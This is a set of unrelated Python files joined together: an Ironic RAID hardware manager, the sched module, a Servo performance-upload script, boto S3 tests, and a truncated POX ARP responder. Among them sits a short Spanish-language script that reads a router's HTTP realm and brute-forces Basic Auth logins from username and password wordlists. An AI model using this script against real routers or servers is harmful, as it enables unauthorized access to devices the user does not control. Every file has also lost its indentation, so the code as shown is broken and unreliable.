# Copyright 2016 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_log import log
from ironic_python_agent import hardware
from megautils.raid.adapter import Adapter
from megautils.raid_ircu.adapter import Adapter as SASAdapter
from megautils.raid.virtual_driver import VirtualDriver
from megautils.raid_ircu.virtual_driver import VirtualDriver as SASVirtualDriver
from megautils.raid.virtual_driver import validate_raid_schema
from megautils.raid.disk_allocator import allocate_disks
from megautils.raid_ircu.disk_allocator import allocate_disks as sas_allocate_disks
LOG = log.getLogger(__name__)
class MegaHardwareManager(hardware.GenericHardwareManager):
HARDWARE_MANAGER_VERSION = "4"
LSI_RAID_PROVIDER = 4
def evaluate_hardware_support(cls):
adapters = Adapter().get_adapters()
return cls.LSI_RAID_PROVIDER if adapters else hardware.HardwareSupport.NONE
def list_hardware_info(self):
"""Return full hardware inventory as a serializable dict.
This inventory is sent to Ironic on lookup and to Inspector on
inspection.
:return: a dictionary representing inventory
"""
hardware_info = {}
hardware_info['interfaces'] = self.list_network_interfaces()
hardware_info['cpu'] = self.get_cpus()
hardware_info['disks'] = hardware.list_all_block_devices()
hardware_info['physical_disks'] = self.list_all_physical_disks()
hardware_info['memory'] = self.get_memory()
hardware_info['bmc_address'] = self.get_bmc_address()
hardware_info['system_vendor'] = self.get_system_vendor_info()
hardware_info['boot'] = self.get_boot_info()
return hardware_info
def list_all_physical_disks(self):
"""
Get all physical disks to node for allocation
:return: physical disk dict
"""
adapters = Adapter().get_adapters()
cache_physical_drivers = []
for adapter in adapters:
pds = adapter.get_physical_drivers()
for pd in pds:
cache_physical_drivers.append({
'size': pd.raw_size,
'type': pd.pd_type,
'enclosure': pd.enclosure,
'slot': pd.enclosure,
'wwn': pd.wwn
})
return cache_physical_drivers
def get_clean_steps(self, node, ports):
"""Return the clean steps supported by this hardware manager.
This method returns the clean steps that are supported by
proliant hardware manager. This method is invoked on every
hardware manager by Ironic Python Agent to give this information
back to Ironic.
:param node: A dictionary of the node object
:param ports: A list of dictionaries containing information of ports
for the node
:returns: A list of dictionaries, each item containing the step name,
interface and priority for the clean step.
"""
return [
{'step': 'create_configuration',
'interface': 'raid',
'priority': 0},
{'step': 'delete_configuration',
'interface': 'raid',
'priority': 1}
]
def create_configuration(self, node, ports):
"""
Create a Raid configuration to the baremetal node
:param node: ironic node object
:param ports: ironic port objects
:return: current raid configuration schema
"""
LOG.info('creating configuration of node %s' % node['uuid'])
target_raid_config = node.get('target_raid_config', {}).copy()
LOG.debug('node raid config: %s' % target_raid_config)
validate_raid_schema(target_raid_config)
target_sorted_virtual_driver = (
sorted((x for x in target_raid_config['logical_disks']
if x['size_gb'] != 'MAX'),
reverse=True,
key=lambda x: x['size_gb']) +
[x for x in target_raid_config['logical_disks']
if x['size_gb'] == 'MAX'])
for target_virtual_driver in target_sorted_virtual_driver:
adapter = target_virtual_driver.get('controller', 0)
vd = VirtualDriver(adapter_id=adapter)
count = target_virtual_driver.get('count', 1)
for i in range(0, count):
if 'physical_disks' not in target_virtual_driver:
allocate_disks(adapter, target_virtual_driver)
vd.create(target_virtual_driver['raid_level'],
target_virtual_driver['physical_disks'])
if target_raid_config.get('is_root_volume', False)\
and count == 1:
vd.set_boot_able()
return target_raid_config
def delete_configuration(self, node, ports):
"""
Delete all Raid configuration to the baremetal node
:param node: ironic node object
:param ports: ironic port objects
:return: execute messages
"""
adapters = Adapter().get_adapters()
cache_virtual_drivers = []
for adapter in adapters:
cache_virtual_drivers += adapter.get_virtual_drivers()
LOG.info('deleting virtual drivers')
for virtual_driver in cache_virtual_drivers:
LOG.debug('deleting virtual driver %s of adapter %s' %
(virtual_driver.id, virtual_driver.adapter))
virtual_driver.destroy()
return 'raid clean execution success'
class MegaSAS3HardwareManager(MegaHardwareManager):
HARDWARE_MANAGER_VERSION = "5"
LSI_RAID_PROVIDER = 5
def evaluate_hardware_support(cls):
adapters = SASAdapter().get_adapters()
return cls.LSI_RAID_PROVIDER if adapters else hardware.HardwareSupport.NONE
def list_all_physical_disks(self):
"""
Get all physical disks to node for allocation
:return: physical disk dict
"""
adapters = SASAdapter().get_adapters()
cache_physical_drivers = []
for adapter in adapters:
pds = adapter.get_physical_drivers()
for pd in pds:
cache_physical_drivers.append({
'size': pd.size,
'type': pd.drive_type,
'enclosure': pd.enclosure,
'slot': pd.slot,
'wwn': pd.guid
})
return cache_physical_drivers
def create_configuration(self, node, ports):
"""
Create a Raid configuration to the baremetal node
:param node: ironic node object
:param ports: ironic port objects
:return: current raid configuration schema
"""
LOG.info('creating configuration of node %s' % node['uuid'])
target_raid_config = node.get('target_raid_config', {}).copy()
LOG.debug('node raid config: %s' % target_raid_config)
validate_raid_schema(target_raid_config)
target_sorted_virtual_driver = (
sorted((x for x in target_raid_config['logical_disks']
if x['size_gb'] != 'MAX'),
reverse=True,
key=lambda x: x['size_gb']) +
[x for x in target_raid_config['logical_disks']
if x['size_gb'] == 'MAX'])
for target_virtual_driver in target_sorted_virtual_driver:
adapter = target_virtual_driver.get('controller', 0)
vd = SASVirtualDriver(adapter_id=adapter)
count = target_virtual_driver.get('count', 1)
for i in range(0, count):
if 'physical_disks' not in target_virtual_driver:
sas_allocate_disks(adapter, target_virtual_driver)
vd.create(target_virtual_driver['raid_level'],
target_virtual_driver['physical_disks'])
if target_raid_config.get('is_root_volume', False)\
and count == 1:
vd.set_boot_able()
return target_raid_config
def delete_configuration(self, node, ports):
"""
Delete all Raid configuration to the baremetal node
:param node: ironic node object
:param ports: ironic port objects
:return: execute messages
"""
adapters = SASAdapter().get_adapters()
cache_virtual_drivers = []
for adapter in adapters:
cache_virtual_drivers += adapter.get_virtual_drivers()
LOG.info('deleting virtual drivers')
for virtual_driver in cache_virtual_drivers:
LOG.debug('deleting virtual driver %s of adapter %s' %
(virtual_driver.id, virtual_driver.adapter))
virtual_driver.destroy()
return 'raid clean execution success' | unknown | codeparrot/codeparrot-clean | ||
"""A generally useful event scheduler class.
Each instance of this class manages its own queue.
No multi-threading is implied; you are supposed to hack that
yourself, or use a single instance per application.
Each instance is parametrized with two functions, one that is
supposed to return the current time, one that is supposed to
implement a delay. You can implement real-time scheduling by
substituting time and sleep from built-in module time, or you can
implement simulated time by writing your own functions. This can
also be used to integrate scheduling with STDWIN events; the delay
function is allowed to modify the queue. Time can be expressed as
integers or floating point numbers, as long as it is consistent.
Events are specified by tuples (time, priority, action, argument, kwargs).
As in UNIX, lower priority numbers mean higher priority; in this
way the queue can be maintained as a priority queue. Execution of the
event means calling the action function, passing it the argument
sequence in "argument" (remember that in Python, multiple function
arguments are be packed in a sequence) and keyword parameters in "kwargs".
The action function may be an instance method so it
has another way to reference private data (besides global variables).
"""
# XXX The timefunc and delayfunc should have been defined as methods
# XXX so you can define new kinds of schedulers using subclassing
# XXX instead of having to define a module or class just to hold
# XXX the global state of your particular time and delay functions.
import time
import heapq
from collections import namedtuple
try:
import threading
except ImportError:
import dummy_threading as threading
from time import monotonic as _time
__all__ = ["scheduler"]
class Event(namedtuple('Event', 'time, priority, action, argument, kwargs')):
def __eq__(s, o): return (s.time, s.priority) == (o.time, o.priority)
def __lt__(s, o): return (s.time, s.priority) < (o.time, o.priority)
def __le__(s, o): return (s.time, s.priority) <= (o.time, o.priority)
def __gt__(s, o): return (s.time, s.priority) > (o.time, o.priority)
def __ge__(s, o): return (s.time, s.priority) >= (o.time, o.priority)
_sentinel = object()
class scheduler:
def __init__(self, timefunc=_time, delayfunc=time.sleep):
"""Initialize a new instance, passing the time and delay
functions"""
self._queue = []
self._lock = threading.RLock()
self.timefunc = timefunc
self.delayfunc = delayfunc
def enterabs(self, time, priority, action, argument=(), kwargs=_sentinel):
"""Enter a new event in the queue at an absolute time.
Returns an ID for the event which can be used to remove it,
if necessary.
"""
if kwargs is _sentinel:
kwargs = {}
event = Event(time, priority, action, argument, kwargs)
with self._lock:
heapq.heappush(self._queue, event)
return event # The ID
def enter(self, delay, priority, action, argument=(), kwargs=_sentinel):
"""A variant that specifies the time as a relative time.
This is actually the more commonly used interface.
"""
time = self.timefunc() + delay
return self.enterabs(time, priority, action, argument, kwargs)
def cancel(self, event):
"""Remove an event from the queue.
This must be presented the ID as returned by enter().
If the event is not in the queue, this raises ValueError.
"""
with self._lock:
self._queue.remove(event)
heapq.heapify(self._queue)
def empty(self):
"""Check whether the queue is empty."""
with self._lock:
return not self._queue
def run(self, blocking=True):
"""Execute events until the queue is empty.
If blocking is False executes the scheduled events due to
expire soonest (if any) and then return the deadline of the
next scheduled call in the scheduler.
When there is a positive delay until the first event, the
delay function is called and the event is left in the queue;
otherwise, the event is removed from the queue and executed
(its action function is called, passing it the argument). If
the delay function returns prematurely, it is simply
restarted.
It is legal for both the delay function and the action
function to modify the queue or to raise an exception;
exceptions are not caught but the scheduler's state remains
well-defined so run() may be called again.
A questionable hack is added to allow other threads to run:
just after an event is executed, a delay of 0 is executed, to
avoid monopolizing the CPU when other threads are also
runnable.
"""
# localize variable access to minimize overhead
# and to improve thread safety
lock = self._lock
q = self._queue
delayfunc = self.delayfunc
timefunc = self.timefunc
pop = heapq.heappop
while True:
with lock:
if not q:
break
time, priority, action, argument, kwargs = q[0]
now = timefunc()
if time > now:
delay = True
else:
delay = False
pop(q)
if delay:
if not blocking:
return time - now
delayfunc(time - now)
else:
action(*argument, **kwargs)
delayfunc(0) # Let other threads run
@property
def queue(self):
"""An ordered list of upcoming events.
Events are named tuples with fields for:
time, priority, action, arguments, kwargs
"""
# Use heapq to sort the queue rather than using 'sorted(self._queue)'.
# With heapq, two events scheduled at the same time will show in
# the actual order they would be retrieved.
with self._lock:
events = self._queue[:]
return list(map(heapq.heappop, [events]*len(events))) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python3
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import argparse
from functools import partial, reduce
import json
import operator
import os
import random
import string
from thclient import (TreeherderClient, TreeherderResultSetCollection,
TreeherderJobCollection)
import time
from runner import format_result_summary
def geometric_mean(iterable):
filtered = list(filter(lambda x: x > 0, iterable))
return (reduce(operator.mul, filtered)) ** (1.0 / len(filtered))
def format_testcase_name(name):
temp = name.replace('http://localhost:8000/page_load_test/', '')
temp = temp.replace('http://localhost:8000/tp6/', '')
temp = temp.split('/')[0]
temp = temp[0:80]
return temp
def format_perf_data(perf_json, engine='servo'):
suites = []
measurement = "domComplete" # Change this to an array when we have more
def get_time_from_nav_start(timings, measurement):
return timings[measurement] - timings['navigationStart']
measurementFromNavStart = partial(get_time_from_nav_start,
measurement=measurement)
if (engine == 'gecko'):
name = 'gecko.{}'.format(measurement)
else:
name = measurement
suite = {
"name": name,
"value": geometric_mean(map(measurementFromNavStart, perf_json)),
"subtests": []
}
for testcase in perf_json:
if measurementFromNavStart(testcase) < 0:
value = -1
# print('Error: test case has negative timing. Test timeout?')
else:
value = measurementFromNavStart(testcase)
suite["subtests"].append({
"name": format_testcase_name(testcase["testcase"]),
"value": value
})
suites.append(suite)
return {
"performance_data": {
# https://bugzilla.mozilla.org/show_bug.cgi?id=1271472
"framework": {"name": "servo-perf"},
"suites": suites
}
}
def create_resultset_collection(dataset):
print("[DEBUG] ResultSet Collection:")
print(dataset)
trsc = TreeherderResultSetCollection()
for data in dataset:
trs = trsc.get_resultset()
trs.add_push_timestamp(data['push_timestamp'])
trs.add_revision(data['revision'])
trs.add_author(data['author'])
# TODO: figure out where type is used
# trs.add_type(data['type'])
revisions = []
for rev in data['revisions']:
tr = trs.get_revision()
tr.add_revision(rev['revision'])
tr.add_author(rev['author'])
tr.add_comment(rev['comment'])
tr.add_repository(rev['repository'])
revisions.append(tr)
trs.add_revisions(revisions)
trsc.add(trs)
return trsc
def create_job_collection(dataset):
print("[DEBUG] Job Collection:")
print(dataset)
tjc = TreeherderJobCollection()
for data in dataset:
tj = tjc.get_job()
tj.add_revision(data['revision'])
tj.add_project(data['project'])
tj.add_coalesced_guid(data['job']['coalesced'])
tj.add_job_guid(data['job']['job_guid'])
tj.add_job_name(data['job']['name'])
tj.add_job_symbol(data['job']['job_symbol'])
tj.add_group_name(data['job']['group_name'])
tj.add_group_symbol(data['job']['group_symbol'])
tj.add_description(data['job']['desc'])
tj.add_product_name(data['job']['product_name'])
tj.add_state(data['job']['state'])
tj.add_result(data['job']['result'])
tj.add_reason(data['job']['reason'])
tj.add_who(data['job']['who'])
tj.add_tier(data['job']['tier'])
tj.add_submit_timestamp(data['job']['submit_timestamp'])
tj.add_start_timestamp(data['job']['start_timestamp'])
tj.add_end_timestamp(data['job']['end_timestamp'])
tj.add_machine(data['job']['machine'])
tj.add_build_info(
data['job']['build_platform']['os_name'],
data['job']['build_platform']['platform'],
data['job']['build_platform']['architecture']
)
tj.add_machine_info(
data['job']['machine_platform']['os_name'],
data['job']['machine_platform']['platform'],
data['job']['machine_platform']['architecture']
)
tj.add_option_collection(data['job']['option_collection'])
for artifact_data in data['job']['artifacts']:
tj.add_artifact(
artifact_data['name'],
artifact_data['type'],
artifact_data['blob']
)
tjc.add(tj)
return tjc
# TODO: refactor this big function to smaller chunks
def submit(perf_data, failures, revision, summary, engine):
print("[DEBUG] failures:")
print(list(map(lambda x: x['testcase'], failures)))
author = "{} <{}>".format(revision['author']['name'],
revision['author']['email'])
dataset = [
{
# The top-most revision in the list of commits for a push.
'revision': revision['commit'],
'author': author,
'push_timestamp': int(revision['author']['timestamp']),
'type': 'push',
# a list of revisions associated with the resultset. There should
# be at least one.
'revisions': [
{
'comment': revision['subject'],
'revision': revision['commit'],
'repository': 'servo',
'author': author
}
]
}
]
trsc = create_resultset_collection(dataset)
result = "success"
# TODO: verify a failed test won't affect Perfherder visualization
# if len(failures) > 0:
# result = "testfailed"
hashlen = len(revision['commit'])
job_guid = ''.join(
random.choice(string.ascii_letters + string.digits) for i in range(hashlen)
)
if (engine == "gecko"):
project = "servo"
job_symbol = 'PLG'
group_symbol = 'SPG'
group_name = 'Servo Perf on Gecko'
else:
project = "servo"
job_symbol = 'PL'
group_symbol = 'SP'
group_name = 'Servo Perf'
dataset = [
{
'project': project,
'revision': revision['commit'],
'job': {
'job_guid': job_guid,
'product_name': project,
'reason': 'scheduler',
# TODO: What is `who` for?
'who': 'Servo',
'desc': 'Servo Page Load Time Tests',
'name': 'Servo Page Load Time',
# The symbol representing the job displayed in
# treeherder.allizom.org
'job_symbol': job_symbol,
# The symbol representing the job group in
# treeherder.allizom.org
'group_symbol': group_symbol,
'group_name': group_name,
# TODO: get the real timing from the test runner
'submit_timestamp': str(int(time.time())),
'start_timestamp': str(int(time.time())),
'end_timestamp': str(int(time.time())),
'state': 'completed',
'result': result, # "success" or "testfailed"
'machine': 'local-machine',
# TODO: read platform from test result
'build_platform': {
'platform': 'linux64',
'os_name': 'linux',
'architecture': 'x86_64'
},
'machine_platform': {
'platform': 'linux64',
'os_name': 'linux',
'architecture': 'x86_64'
},
'option_collection': {'opt': True},
# jobs can belong to different tiers
# setting the tier here will determine which tier the job
# belongs to. However, if a job is set as Tier of 1, but
# belongs to the Tier 2 profile on the server, it will still
# be saved as Tier 2.
'tier': 1,
# the ``name`` of the log can be the default of "buildbot_text"
# however, you can use a custom name. See below.
# TODO: point this to the log when we have them uploaded to S3
'log_references': [
{
'url': 'TBD',
'name': 'test log'
}
],
# The artifact can contain any kind of structured data
# associated with a test.
'artifacts': [
{
'type': 'json',
'name': 'performance_data',
# TODO: include the job_guid when the runner actually
# generates one
# 'job_guid': job_guid,
'blob': perf_data
},
{
'type': 'json',
'name': 'Job Info',
# 'job_guid': job_guid,
"blob": {
"job_details": [
{
"content_type": "raw_html",
"title": "Result Summary",
"value": summary
}
]
}
}
],
# List of job guids that were coalesced to this job
'coalesced': []
}
}
]
tjc = create_job_collection(dataset)
# TODO: extract this read credential code out of this function.
cred = {
'client_id': os.environ['TREEHERDER_CLIENT_ID'],
'secret': os.environ['TREEHERDER_CLIENT_SECRET']
}
client = TreeherderClient(server_url='https://treeherder.mozilla.org',
client_id=cred['client_id'],
secret=cred['secret'])
# data structure validation is automatically performed here, if validation
# fails a TreeherderClientError is raised
client.post_collection('servo', trsc)
client.post_collection('servo', tjc)
def main():
parser = argparse.ArgumentParser(
description=("Submit Servo performance data to Perfherder. "
"Remember to set your Treeherder credential as environment"
" variable \'TREEHERDER_CLIENT_ID\' and "
"\'TREEHERDER_CLIENT_SECRET\'"))
parser.add_argument("perf_json",
help="the output json from runner")
parser.add_argument("revision_json",
help="the json containing the servo revision data")
parser.add_argument("--engine",
type=str,
default='servo',
help=("The engine to run the tests on. Currently only"
" servo and gecko are supported."))
args = parser.parse_args()
with open(args.perf_json, 'r') as f:
result_json = json.load(f)
with open(args.revision_json, 'r') as f:
revision = json.load(f)
perf_data = format_perf_data(result_json, args.engine)
failures = list(filter(lambda x: x['domComplete'] == -1, result_json))
summary = format_result_summary(result_json).replace('\n', '<br/>')
submit(perf_data, failures, revision, summary, args.engine)
print("Done!")
if __name__ == "__main__":
main() | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
# Copyright (c) 2011 Mitch Garnaat http://garnaat.org/
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Some unit tests for the S3 Bucket
"""
from mock import patch, Mock
import unittest
import time
from boto.exception import S3ResponseError
from boto.s3.connection import S3Connection
from boto.s3.bucketlogging import BucketLogging
from boto.s3.lifecycle import Lifecycle
from boto.s3.lifecycle import Transition
from boto.s3.lifecycle import Expiration
from boto.s3.lifecycle import Rule
from boto.s3.acl import Grant
from boto.s3.tagging import Tags, TagSet
from boto.s3.website import RedirectLocation
from boto.compat import urllib
class S3BucketTest (unittest.TestCase):
s3 = True
def setUp(self):
self.conn = S3Connection()
self.bucket_name = 'bucket-%d' % int(time.time())
self.bucket = self.conn.create_bucket(self.bucket_name)
def tearDown(self):
for key in self.bucket:
key.delete()
self.bucket.delete()
def test_next_marker(self):
expected = ["a/", "b", "c"]
for key_name in expected:
key = self.bucket.new_key(key_name)
key.set_contents_from_string(key_name)
# Normal list of first 2 keys will have
# no NextMarker set, so we use last key to iterate
# last element will be "b" so no issue.
rs = self.bucket.get_all_keys(max_keys=2)
for element in rs:
pass
self.assertEqual(element.name, "b")
self.assertEqual(rs.next_marker, None)
# list using delimiter of first 2 keys will have
# a NextMarker set (when truncated). As prefixes
# are grouped together at the end, we get "a/" as
# last element, but luckily we have next_marker.
rs = self.bucket.get_all_keys(max_keys=2, delimiter="/")
for element in rs:
pass
self.assertEqual(element.name, "a/")
self.assertEqual(rs.next_marker, "b")
# ensure bucket.list() still works by just
# popping elements off the front of expected.
rs = self.bucket.list()
for element in rs:
self.assertEqual(element.name, expected.pop(0))
self.assertEqual(expected, [])
def test_list_with_url_encoding(self):
expected = ["α", "β", "γ"]
for key_name in expected:
key = self.bucket.new_key(key_name)
key.set_contents_from_string(key_name)
# ensure bucket.list() still works by just
# popping elements off the front of expected.
orig_getall = self.bucket._get_all
getall = lambda *a, **k: orig_getall(*a, max_keys=2, **k)
with patch.object(self.bucket, '_get_all', getall):
rs = self.bucket.list(encoding_type="url")
for element in rs:
name = urllib.parse.unquote(element.name.encode('utf-8'))
self.assertEqual(name, expected.pop(0))
self.assertEqual(expected, [])
def test_logging(self):
# use self.bucket as the target bucket so that teardown
# will delete any log files that make it into the bucket
# automatically and all we have to do is delete the
# source bucket.
sb_name = "src-" + self.bucket_name
sb = self.conn.create_bucket(sb_name)
# grant log write perms to target bucket using canned-acl
self.bucket.set_acl("log-delivery-write")
target_bucket = self.bucket_name
target_prefix = u"jp/ログ/"
# Check existing status is disabled
bls = sb.get_logging_status()
self.assertEqual(bls.target, None)
# Create a logging status and grant auth users READ PERM
authuri = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
authr = Grant(permission="READ", type="Group", uri=authuri)
sb.enable_logging(target_bucket, target_prefix=target_prefix, grants=[authr])
# Check the status and confirm its set.
bls = sb.get_logging_status()
self.assertEqual(bls.target, target_bucket)
self.assertEqual(bls.prefix, target_prefix)
self.assertEqual(len(bls.grants), 1)
self.assertEqual(bls.grants[0].type, "Group")
self.assertEqual(bls.grants[0].uri, authuri)
# finally delete the src bucket
sb.delete()
def test_tagging(self):
tagging = """
<Tagging>
<TagSet>
<Tag>
<Key>tagkey</Key>
<Value>tagvalue</Value>
</Tag>
</TagSet>
</Tagging>
"""
self.bucket.set_xml_tags(tagging)
response = self.bucket.get_tags()
self.assertEqual(response[0][0].key, 'tagkey')
self.assertEqual(response[0][0].value, 'tagvalue')
self.bucket.delete_tags()
try:
self.bucket.get_tags()
except S3ResponseError as e:
self.assertEqual(e.code, 'NoSuchTagSet')
except Exception as e:
self.fail("Wrong exception raised (expected S3ResponseError): %s"
% e)
else:
self.fail("Expected S3ResponseError, but no exception raised.")
def test_tagging_from_objects(self):
"""Create tags from python objects rather than raw xml."""
t = Tags()
tag_set = TagSet()
tag_set.add_tag('akey', 'avalue')
tag_set.add_tag('anotherkey', 'anothervalue')
t.add_tag_set(tag_set)
self.bucket.set_tags(t)
response = self.bucket.get_tags()
self.assertEqual(response[0][0].key, 'akey')
self.assertEqual(response[0][0].value, 'avalue')
self.assertEqual(response[0][1].key, 'anotherkey')
self.assertEqual(response[0][1].value, 'anothervalue')
def test_website_configuration(self):
response = self.bucket.configure_website('index.html')
self.assertTrue(response)
config = self.bucket.get_website_configuration()
self.assertEqual(config, {'WebsiteConfiguration':
{'IndexDocument': {'Suffix': 'index.html'}}})
config2, xml = self.bucket.get_website_configuration_with_xml()
self.assertEqual(config, config2)
self.assertTrue('<Suffix>index.html</Suffix>' in xml, xml)
def test_website_redirect_all_requests(self):
response = self.bucket.configure_website(
redirect_all_requests_to=RedirectLocation('example.com'))
config = self.bucket.get_website_configuration()
self.assertEqual(config, {
'WebsiteConfiguration': {
'RedirectAllRequestsTo': {
'HostName': 'example.com'}}})
# Can configure the protocol as well.
response = self.bucket.configure_website(
redirect_all_requests_to=RedirectLocation('example.com', 'https'))
config = self.bucket.get_website_configuration()
self.assertEqual(config, {
'WebsiteConfiguration': {'RedirectAllRequestsTo': {
'HostName': 'example.com',
'Protocol': 'https',
}}}
)
def test_lifecycle(self):
lifecycle = Lifecycle()
lifecycle.add_rule('myid', '', 'Enabled', 30)
self.assertTrue(self.bucket.configure_lifecycle(lifecycle))
response = self.bucket.get_lifecycle_config()
self.assertEqual(len(response), 1)
actual_lifecycle = response[0]
self.assertEqual(actual_lifecycle.id, 'myid')
self.assertEqual(actual_lifecycle.prefix, '')
self.assertEqual(actual_lifecycle.status, 'Enabled')
self.assertEqual(actual_lifecycle.transition, None)
def test_lifecycle_with_glacier_transition(self):
lifecycle = Lifecycle()
transition = Transition(days=30, storage_class='GLACIER')
rule = Rule('myid', prefix='', status='Enabled', expiration=None,
transition=transition)
lifecycle.append(rule)
self.assertTrue(self.bucket.configure_lifecycle(lifecycle))
response = self.bucket.get_lifecycle_config()
transition = response[0].transition
self.assertEqual(transition.days, 30)
self.assertEqual(transition.storage_class, 'GLACIER')
self.assertEqual(transition.date, None)
def test_lifecycle_multi(self):
date = '2022-10-12T00:00:00.000Z'
sc = 'GLACIER'
lifecycle = Lifecycle()
lifecycle.add_rule("1", "1/", "Enabled", 1)
lifecycle.add_rule("2", "2/", "Enabled", Expiration(days=2))
lifecycle.add_rule("3", "3/", "Enabled", Expiration(date=date))
lifecycle.add_rule("4", "4/", "Enabled", None,
Transition(days=4, storage_class=sc))
lifecycle.add_rule("5", "5/", "Enabled", None,
Transition(date=date, storage_class=sc))
# set the lifecycle
self.bucket.configure_lifecycle(lifecycle)
# read the lifecycle back
readlifecycle = self.bucket.get_lifecycle_config();
for rule in readlifecycle:
if rule.id == "1":
self.assertEqual(rule.prefix, "1/")
self.assertEqual(rule.expiration.days, 1)
elif rule.id == "2":
self.assertEqual(rule.prefix, "2/")
self.assertEqual(rule.expiration.days, 2)
elif rule.id == "3":
self.assertEqual(rule.prefix, "3/")
self.assertEqual(rule.expiration.date, date)
elif rule.id == "4":
self.assertEqual(rule.prefix, "4/")
self.assertEqual(rule.transition.days, 4)
self.assertEqual(rule.transition.storage_class, sc)
elif rule.id == "5":
self.assertEqual(rule.prefix, "5/")
self.assertEqual(rule.transition.date, date)
self.assertEqual(rule.transition.storage_class, sc)
else:
self.fail("unexpected id %s" % rule.id)
def test_lifecycle_jp(self):
# test lifecycle with Japanese prefix
name = "Japanese files"
prefix = "日本語/"
days = 30
lifecycle = Lifecycle()
lifecycle.add_rule(name, prefix, "Enabled", days)
# set the lifecycle
self.bucket.configure_lifecycle(lifecycle)
# read the lifecycle back
readlifecycle = self.bucket.get_lifecycle_config();
for rule in readlifecycle:
self.assertEqual(rule.id, name)
self.assertEqual(rule.expiration.days, days)
#Note: Boto seems correct? AWS seems broken?
#self.assertEqual(rule.prefix, prefix)
def test_lifecycle_with_defaults(self):
lifecycle = Lifecycle()
lifecycle.add_rule(expiration=30)
self.assertTrue(self.bucket.configure_lifecycle(lifecycle))
response = self.bucket.get_lifecycle_config()
self.assertEqual(len(response), 1)
actual_lifecycle = response[0]
self.assertNotEqual(len(actual_lifecycle.id), 0)
self.assertEqual(actual_lifecycle.prefix, '')
def test_lifecycle_rule_xml(self):
# create a rule directly with id, prefix defaults
rule = Rule(status='Enabled', expiration=30)
s = rule.to_xml()
# Confirm no ID is set in the rule.
self.assertEqual(s.find("<ID>"), -1)
# Confirm Prefix is '' and not set to 'None'
self.assertNotEqual(s.find("<Prefix></Prefix>"), -1) | unknown | codeparrot/codeparrot-clean | ||
import urllib.request as ur
import http.client
import sys
def get_realm(ip):
realm_router = ""
try:
conn = http.client.HTTPConnection(ip)
conn.request("GET", "/")
res = conn.getresponse()
realm_router = res.getheader("WWW-Authenticate")
realm_router = realm_router.split("=")[1].strip("\"")
return realm_router
except Exception as e:
print(e)
sys.exit(0)
def atack(ip, users, passwords):
passwords = passwords.read().split("\n")
find = False
realm_router = get_realm(ip)
for u in users:
u2 = u.strip()
for p in passwords:
p2 = p.strip()
try:
auth_handler = ur.HTTPBasicAuthHandler()
auth_handler.add_password(realm=realm_router,
uri=ip,
user=u2,
passwd=p2)
opener = ur.build_opener(auth_handler)
ur.install_opener(opener)
pag = ur.urlopen("http://" + str(ip))
if(pag.getcode() == 200):
print(chr(27) + "[1;34m[+]"+ chr(27)
+ "[0m Login found: " + str(u2) + ":" + str(p2))
find = True
except:
print(chr(27) + "[1;31m[-] "+ chr(27)
+ "[0m" + str(u2) + ":" + str(p2) + " >> failed" )
if not find:
print("Login not found.")
#Inicio del programa
if __name__ == "__main__":
ip = input("Introduce la IP: ")
try:
users = input("Archivo con los usuarios: ")
users = open(users, "r")
passwords = input("Archivos con las contraseñas: ")
passwords = open(passwords, "r")
except:
print("Imposible leer el fichero")
sys.exit(0)
atack(ip, users, passwords) | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2011,2012 James McCauley
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
An ARP utility that can learn and proxy ARPs, and can also answer queries
from a list of static entries.
This adds the "arp" object to the console, which you can use to look at
or modify the ARP table.
Add ARP entries on commandline like:
arp_responder --<IP>=<MAC> --<IP>=<MAC>
Leave MAC unspecified if you want to use the switch MAC.
"""
from pox.core import core
import pox
log = core.getLogger()
from pox.lib.packet.ethernet import ethernet, ETHER_BROADCAST
from pox.lib.packet.arp import arp
from pox.lib.packet.vlan import vlan
from pox.lib.addresses import IPAddr, EthAddr
from pox.lib.util import dpid_to_str, str_to_bool
from pox.lib.recoco import Timer
from pox.lib.revent import EventHalt
import pox.openflow.libopenflow_01 as of
import time
# Timeout for ARP entries
ARP_TIMEOUT = 60 * 4
class Entry (object):
"""
We use the MAC to answer ARP replies.
We use the timeout so that if an entry is older than ARP_TIMEOUT, we
flood the ARP request rather than try to answer it ourselves.
"""
def __init__ (self, mac, static = None, flood = None):
self.timeout = time.time() + ARP_TIMEOUT
self.static = False
self.flood = True
if mac is True:
# Means use switch's MAC, implies static/noflood
self.mac = True
self.static = True
self.flood = False
else:
